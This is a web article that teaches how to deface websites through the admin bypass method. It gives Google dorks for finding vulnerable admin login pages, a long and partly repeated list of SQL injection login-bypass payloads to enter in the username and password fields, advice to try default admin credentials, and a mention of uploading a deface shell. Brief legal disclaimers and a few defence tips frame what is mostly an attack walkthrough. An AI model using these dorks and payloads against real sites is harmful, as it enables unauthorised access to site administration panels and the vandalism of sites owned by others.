How to Deface Website

 

Deface is the term used to change the appearance of a web page in a way that is not intended by the owner. Even though this is an illegal and unlawful act, it is important for website owners to be aware of ways that irresponsible parties can use to deface. In this article, we will discuss one method that is often used in deface, namely the admin bypass method. We will go into detail about these methods, but remember that this knowledge should be used only for lawful and responsible purposes.

What is Admin Bypass Method?

The admin bypass method is a technique used to access the administration page or control panel of a website without having to enter the correct login information. In some cases, websites that do not pay attention to adequate security can be vulnerable to attacks using this method. This means that an attacker with sufficient technical knowledge can gain access to the admin panel and make unwanted changes to the web page.

Steps in Doing Deface with Admin Bypass Method.

Here are the general steps used to deface with the admin bypass method:

1. Dorking

The first step is dorking, dorking is used to find the target website that will be defaced. The dorking function is to find the destination we want based on the keywords we write. Look for the website to be defaced using the following dork:

Admin. php?id=
Admin/login. php
Login.php intitle:"admin login"
Login.php intitle:"admin area "
Login.php intitle:"administrator "
Administrator.php

After you copy one of the keywords above and then paste it into the Google search field, search until you find a website that is vuln or vulnerable.

Keep in mind that you also have to develop the dork, such as adding specific country targets, for example site:uk site:id site:de

2. Exploits Website Vulnerabilities

Once the vulnerability is identified, the attacker will try to exploit the vulnerability. They will use certain techniques, such as entering malicious code or injecting malicious scripts, to gain access to the admin panel.

You can use some of the admin bypass injection codes below to get into the admin panel.

' or 1=1 limit 1 -- -+
'=''OR'
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

Enter the code in the username and password fields, sometimes a website still uses the default login data so it's easier to hack. Like the username admin and the password is also admin.

3. Changing the Appearance of Web Pages

After successfully gaining access to the admin panel, hackers can change the appearance of the web page as they wish. They can replace the background image, add a deface message, or even delete the entire content.

Usually the hackers upload their deface shell or script, but there are also those who actually report the bug to the owner of the website. This action is called a bug bounty or bug hunter.

CONCLUSION

The admin bypass method is one of the techniques that can be used by attackers to deface web pages. Website owners must understand the potential vulnerabilities and take appropriate security measures to protect their websites from attacks. Keeping systems and software updated, using strong passwords, and implementing WAF protection are some of the steps that can help prevent attacks with admin bypass methods.

Never use this knowledge to commit illegal acts or violate the privacy of others. Using expertise responsibly is a principle that must be adhered to by all professionals in the field of information technology.